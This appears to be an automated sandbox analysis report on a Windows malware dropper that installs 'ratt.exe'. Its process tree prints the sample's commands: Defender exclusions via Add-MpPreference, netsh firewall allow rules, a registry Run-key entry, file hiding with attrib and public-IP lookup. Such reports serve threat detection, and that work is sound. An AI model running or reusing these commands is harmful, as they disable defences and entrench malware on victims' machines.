56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf

Analysis

max time kernel
148s
max time network
124s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
12/10/2023, 01:10

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe
Size

1.4MB
MD5

c25453dc66909fff1943754702a5ff60
SHA1

001b5ff77b39a1c381e8ce1102f16e654210c5d2
SHA256

56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf
SHA512

2bdf991f3278e59bfc3ec4b3bc80506189897f9dd6d750e1fc3dad34fc090f1c2171792f6b7b6d64ea8fad1fc936d427a6f5cb767afdc73ebab5ca282d79c224
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
564	netsh.exe
1284	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x002700000001500e-74.dat	acprotect
behavioral1/files/0x002700000001500e-73.dat	acprotect

Executes dropped EXE 2 IoCs

pid	Process
1624	7z.exe
1768	ratt.exe

Loads dropped DLL 4 IoCs

pid	Process
2284	cmd.exe
2284	cmd.exe
1624	7z.exe
1440	powershell.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2284-69-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x00080000000155af-70.dat	upx
behavioral1/files/0x00080000000155af-72.dat	upx
behavioral1/files/0x00080000000155af-68.dat	upx
behavioral1/files/0x00080000000155af-67.dat	upx
behavioral1/files/0x002700000001500e-74.dat	upx
behavioral1/files/0x002700000001500e-73.dat	upx
behavioral1/memory/1624-75-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/1624-79-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/memory/1624-81-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/1624-90-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2472	powershell.exe
2992	powershell.exe
2880	powershell.exe
2696	powershell.exe
2404	powershell.exe
1440	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2780	WMIC.exe
Token: SeSecurityPrivilege	2780	WMIC.exe
Token: SeTakeOwnershipPrivilege	2780	WMIC.exe
Token: SeLoadDriverPrivilege	2780	WMIC.exe
Token: SeSystemProfilePrivilege	2780	WMIC.exe
Token: SeSystemtimePrivilege	2780	WMIC.exe
Token: SeProfSingleProcessPrivilege	2780	WMIC.exe
Token: SeIncBasePriorityPrivilege	2780	WMIC.exe
Token: SeCreatePagefilePrivilege	2780	WMIC.exe
Token: SeBackupPrivilege	2780	WMIC.exe
Token: SeRestorePrivilege	2780	WMIC.exe
Token: SeShutdownPrivilege	2780	WMIC.exe
Token: SeDebugPrivilege	2780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2780	WMIC.exe
Token: SeRemoteShutdownPrivilege	2780	WMIC.exe
Token: SeUndockPrivilege	2780	WMIC.exe
Token: SeManageVolumePrivilege	2780	WMIC.exe
Token: 33	2780	WMIC.exe
Token: 34	2780	WMIC.exe
Token: 35	2780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2780	WMIC.exe
Token: SeSecurityPrivilege	2780	WMIC.exe
Token: SeTakeOwnershipPrivilege	2780	WMIC.exe
Token: SeLoadDriverPrivilege	2780	WMIC.exe
Token: SeSystemProfilePrivilege	2780	WMIC.exe
Token: SeSystemtimePrivilege	2780	WMIC.exe
Token: SeProfSingleProcessPrivilege	2780	WMIC.exe
Token: SeIncBasePriorityPrivilege	2780	WMIC.exe
Token: SeCreatePagefilePrivilege	2780	WMIC.exe
Token: SeBackupPrivilege	2780	WMIC.exe
Token: SeRestorePrivilege	2780	WMIC.exe
Token: SeShutdownPrivilege	2780	WMIC.exe
Token: SeDebugPrivilege	2780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2780	WMIC.exe
Token: SeRemoteShutdownPrivilege	2780	WMIC.exe
Token: SeUndockPrivilege	2780	WMIC.exe
Token: SeManageVolumePrivilege	2780	WMIC.exe
Token: 33	2780	WMIC.exe
Token: 34	2780	WMIC.exe
Token: 35	2780	WMIC.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	WMIC.exe
Token: SeSecurityPrivilege	2392	WMIC.exe
Token: SeTakeOwnershipPrivilege	2392	WMIC.exe
Token: SeLoadDriverPrivilege	2392	WMIC.exe
Token: SeSystemProfilePrivilege	2392	WMIC.exe
Token: SeSystemtimePrivilege	2392	WMIC.exe
Token: SeProfSingleProcessPrivilege	2392	WMIC.exe
Token: SeIncBasePriorityPrivilege	2392	WMIC.exe
Token: SeCreatePagefilePrivilege	2392	WMIC.exe
Token: SeBackupPrivilege	2392	WMIC.exe
Token: SeRestorePrivilege	2392	WMIC.exe
Token: SeShutdownPrivilege	2392	WMIC.exe
Token: SeDebugPrivilege	2392	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2392	WMIC.exe
Token: SeRemoteShutdownPrivilege	2392	WMIC.exe
Token: SeUndockPrivilege	2392	WMIC.exe
Token: SeManageVolumePrivilege	2392	WMIC.exe
Token: 33	2392	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 2284	1988	56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe	28
PID 1988 wrote to memory of 2284	1988	56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe	28
PID 1988 wrote to memory of 2284	1988	56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe	28
PID 1988 wrote to memory of 2284	1988	56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe	28
PID 2284 wrote to memory of 2796	2284	cmd.exe	30
PID 2284 wrote to memory of 2796	2284	cmd.exe	30
PID 2284 wrote to memory of 2796	2284	cmd.exe	30
PID 2284 wrote to memory of 2796	2284	cmd.exe	30
PID 2796 wrote to memory of 2640	2796	cmd.exe	31
PID 2796 wrote to memory of 2640	2796	cmd.exe	31
PID 2796 wrote to memory of 2640	2796	cmd.exe	31
PID 2796 wrote to memory of 2640	2796	cmd.exe	31
PID 2284 wrote to memory of 2792	2284	cmd.exe	32
PID 2284 wrote to memory of 2792	2284	cmd.exe	32
PID 2284 wrote to memory of 2792	2284	cmd.exe	32
PID 2284 wrote to memory of 2792	2284	cmd.exe	32
PID 2792 wrote to memory of 2780	2792	cmd.exe	33
PID 2792 wrote to memory of 2780	2792	cmd.exe	33
PID 2792 wrote to memory of 2780	2792	cmd.exe	33
PID 2792 wrote to memory of 2780	2792	cmd.exe	33
PID 2284 wrote to memory of 2472	2284	cmd.exe	35
PID 2284 wrote to memory of 2472	2284	cmd.exe	35
PID 2284 wrote to memory of 2472	2284	cmd.exe	35
PID 2284 wrote to memory of 2472	2284	cmd.exe	35
PID 2284 wrote to memory of 2992	2284	cmd.exe	36
PID 2284 wrote to memory of 2992	2284	cmd.exe	36
PID 2284 wrote to memory of 2992	2284	cmd.exe	36
PID 2284 wrote to memory of 2992	2284	cmd.exe	36
PID 2284 wrote to memory of 2880	2284	cmd.exe	37
PID 2284 wrote to memory of 2880	2284	cmd.exe	37
PID 2284 wrote to memory of 2880	2284	cmd.exe	37
PID 2284 wrote to memory of 2880	2284	cmd.exe	37
PID 2284 wrote to memory of 2696	2284	cmd.exe	38
PID 2284 wrote to memory of 2696	2284	cmd.exe	38
PID 2284 wrote to memory of 2696	2284	cmd.exe	38
PID 2284 wrote to memory of 2696	2284	cmd.exe	38
PID 2284 wrote to memory of 2404	2284	cmd.exe	39
PID 2284 wrote to memory of 2404	2284	cmd.exe	39
PID 2284 wrote to memory of 2404	2284	cmd.exe	39
PID 2284 wrote to memory of 2404	2284	cmd.exe	39
PID 2284 wrote to memory of 1624	2284	cmd.exe	40
PID 2284 wrote to memory of 1624	2284	cmd.exe	40
PID 2284 wrote to memory of 1624	2284	cmd.exe	40
PID 2284 wrote to memory of 1624	2284	cmd.exe	40
PID 2284 wrote to memory of 1440	2284	cmd.exe	43
PID 2284 wrote to memory of 1440	2284	cmd.exe	43
PID 2284 wrote to memory of 1440	2284	cmd.exe	43
PID 2284 wrote to memory of 1440	2284	cmd.exe	43
PID 1440 wrote to memory of 564	1440	powershell.exe	44
PID 1440 wrote to memory of 564	1440	powershell.exe	44
PID 1440 wrote to memory of 564	1440	powershell.exe	44
PID 1440 wrote to memory of 564	1440	powershell.exe	44
PID 1440 wrote to memory of 1284	1440	powershell.exe	45
PID 1440 wrote to memory of 1284	1440	powershell.exe	45
PID 1440 wrote to memory of 1284	1440	powershell.exe	45
PID 1440 wrote to memory of 1284	1440	powershell.exe	45
PID 1440 wrote to memory of 2332	1440	powershell.exe	46
PID 1440 wrote to memory of 2332	1440	powershell.exe	46
PID 1440 wrote to memory of 2332	1440	powershell.exe	46
PID 1440 wrote to memory of 2332	1440	powershell.exe	46
PID 2332 wrote to memory of 2392	2332	cmd.exe	47
PID 2332 wrote to memory of 2392	2332	cmd.exe	47
PID 2332 wrote to memory of 2392	2332	cmd.exe	47
PID 2332 wrote to memory of 2392	2332	cmd.exe	47

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2964	attrib.exe

C:\Users\Admin\AppData\Local\Temp\56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe
"C:\Users\Admin\AppData\Local\Temp\56e15dc05ade0295f95d1a9c969e2f27f1eb47f87db4d2ef35ea8af51cdb51cf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:564
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1284
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="UUVOHKNL" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:1496
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:928
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      PID:1768
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:2964
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:312
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
23.0MB

MD5
dc380bcbbe43b25c70c0e81501c7a59b

SHA1
eaafd595641e4a1b04531fb01311341d2195129d

SHA256
5014cbf5d77318e3999d6036b91f5cf44c7c9e4520f3f7a49034d7cc960edbd5

SHA512
f169334233deaa595f36d4a2cfd1e5bef93d6a5fded01a5684d0bf96344f14bf1b8af7066f73d6f0b03b05f63ff3e88ef9c022ca696ad8f6c0855f3b7e38c956

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe

Filesize
18.1MB

MD5
6e5139f386a305135c342a2ccae6aa52

SHA1
00c481be142a30017beb81f311ca9af2f17aa5be

SHA256
be28a931bef2fccbf60485cb4d699000ad50b26d3f65a9752b18dd40d6cb317b

SHA512
39992cebcb92162364001e2bc2c1e91a2aa36a2db56cd47f138f9103cb566bf01848b36756e79c49696c3456b8649adfbcc051c4c018c47aaebbcd9e4c63b8e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
11.6MB

MD5
83d1d398957154489662330c858f3515

SHA1
f419a35776b82dec132667b0c5be11cde59d872a

SHA256
0ab48c8f6198749d97ea7d028a78a1ec758e4a08c1c86e742862c4aa934a4bf4

SHA512
78b787d689984b72d88940f917d32dad745fb9519e3c6e314b921fd35dd627c7158e8782142fdcd47a0aaeaaf3ebc2c67eae7a7197500cdfed632efec896a3fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
745.1MB

MD5
be788bb3680cf3809d9678ee6f7ba321

SHA1
499f01d5f654f83e172004dcc03f99abdd251734

SHA256
03a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b

SHA512
83c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PY2OVE9XBNTAT546AKIG.temp

Filesize
7KB

MD5
e3ef2bfdc51095a23c9d934d626543d8

SHA1
e437512178b8695f3804b6872636522060f4aa80

SHA256
89f1e81df57b91a995f23884a39f826a16a970108cca84cabf82c523d9dde5c1

SHA512
f38d42ac5c6f1b2abb986068ed4d342d1342a191893f396bf04e06c5146b2e34a7d90a0785304d6904d11e0b3f991f54c24db9f640d398e5056cbe173895973f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e3ef2bfdc51095a23c9d934d626543d8

SHA1
e437512178b8695f3804b6872636522060f4aa80

SHA256
89f1e81df57b91a995f23884a39f826a16a970108cca84cabf82c523d9dde5c1

SHA512
f38d42ac5c6f1b2abb986068ed4d342d1342a191893f396bf04e06c5146b2e34a7d90a0785304d6904d11e0b3f991f54c24db9f640d398e5056cbe173895973f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e3ef2bfdc51095a23c9d934d626543d8

SHA1
e437512178b8695f3804b6872636522060f4aa80

SHA256
89f1e81df57b91a995f23884a39f826a16a970108cca84cabf82c523d9dde5c1

SHA512
f38d42ac5c6f1b2abb986068ed4d342d1342a191893f396bf04e06c5146b2e34a7d90a0785304d6904d11e0b3f991f54c24db9f640d398e5056cbe173895973f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e3ef2bfdc51095a23c9d934d626543d8

SHA1
e437512178b8695f3804b6872636522060f4aa80

SHA256
89f1e81df57b91a995f23884a39f826a16a970108cca84cabf82c523d9dde5c1

SHA512
f38d42ac5c6f1b2abb986068ed4d342d1342a191893f396bf04e06c5146b2e34a7d90a0785304d6904d11e0b3f991f54c24db9f640d398e5056cbe173895973f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e3ef2bfdc51095a23c9d934d626543d8

SHA1
e437512178b8695f3804b6872636522060f4aa80

SHA256
89f1e81df57b91a995f23884a39f826a16a970108cca84cabf82c523d9dde5c1

SHA512
f38d42ac5c6f1b2abb986068ed4d342d1342a191893f396bf04e06c5146b2e34a7d90a0785304d6904d11e0b3f991f54c24db9f640d398e5056cbe173895973f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e3ef2bfdc51095a23c9d934d626543d8

SHA1
e437512178b8695f3804b6872636522060f4aa80

SHA256
89f1e81df57b91a995f23884a39f826a16a970108cca84cabf82c523d9dde5c1

SHA512
f38d42ac5c6f1b2abb986068ed4d342d1342a191893f396bf04e06c5146b2e34a7d90a0785304d6904d11e0b3f991f54c24db9f640d398e5056cbe173895973f

Download Submit
\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe

Filesize
19.1MB

MD5
cf66fc8f90a7e0d51a3dff6e9bab23dc

SHA1
b39c2ff7c105ee5b82ed327eb43f3e6b1ffdb990

SHA256
7ca57526644b72f37901e6e6faac70f5d520796be887c16ef43f3087a181f8e3

SHA512
b3b5628be0d331dd7cf1103c00499ded9fa0c672ec46b434377b711e0f2ef3a031d6bc058182957f74eb8441435ccf47cce2076033c072596b6a10428092ca95

Download Submit
\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
11.5MB

MD5
d9070bb62e828b326fe6e74a02ffb86d

SHA1
d63ef1262cf67fba06b6cb7c58681ad79b063737

SHA256
a768b39d9703f44db69a39b48b21a5d2284f175fac2c05fc48a44a9fd5da62ba

SHA512
f5891fe6b53b3418d2b59adb47e62fb09983792856ba859076df9f275aa87c45c63741c1f52905e7a72e63886cd1ac3bf4d4948873bbc225ff095951e43cfa47

Download Submit
memory/852-117-0x0000000000E30000-0x0000000000FE6000-memory.dmp

Filesize
1.7MB

Download
memory/852-119-0x000000006FB30000-0x000000007021E000-memory.dmp

Filesize
6.9MB

Download
memory/1440-102-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1440-103-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1440-113-0x00000000737E0000-0x0000000073D8B000-memory.dmp

Filesize
5.7MB

Download
memory/1440-108-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1440-107-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1440-106-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1440-105-0x00000000737E0000-0x0000000073D8B000-memory.dmp

Filesize
5.7MB

Download
memory/1440-99-0x00000000737E0000-0x0000000073D8B000-memory.dmp

Filesize
5.7MB

Download
memory/1440-101-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1440-100-0x00000000737E0000-0x0000000073D8B000-memory.dmp

Filesize
5.7MB

Download
memory/1624-79-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1624-75-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/1624-90-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1624-81-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download
memory/1768-116-0x0000000000DD0000-0x0000000000F86000-memory.dmp

Filesize
1.7MB

Download
memory/1768-118-0x000000006FB30000-0x000000007021E000-memory.dmp

Filesize
6.9MB

Download
memory/2284-78-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2284-71-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2284-77-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2284-69-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2404-64-0x00000000737B0000-0x0000000073D5B000-memory.dmp

Filesize
5.7MB

Download
memory/2404-65-0x00000000737B0000-0x0000000073D5B000-memory.dmp

Filesize
5.7MB

Download
memory/2404-66-0x00000000737B0000-0x0000000073D5B000-memory.dmp

Filesize
5.7MB

Download
memory/2472-29-0x0000000002000000-0x0000000002040000-memory.dmp

Filesize
256KB

Download
memory/2472-28-0x0000000002000000-0x0000000002040000-memory.dmp

Filesize
256KB

Download
memory/2472-30-0x0000000073A80000-0x000000007402B000-memory.dmp

Filesize
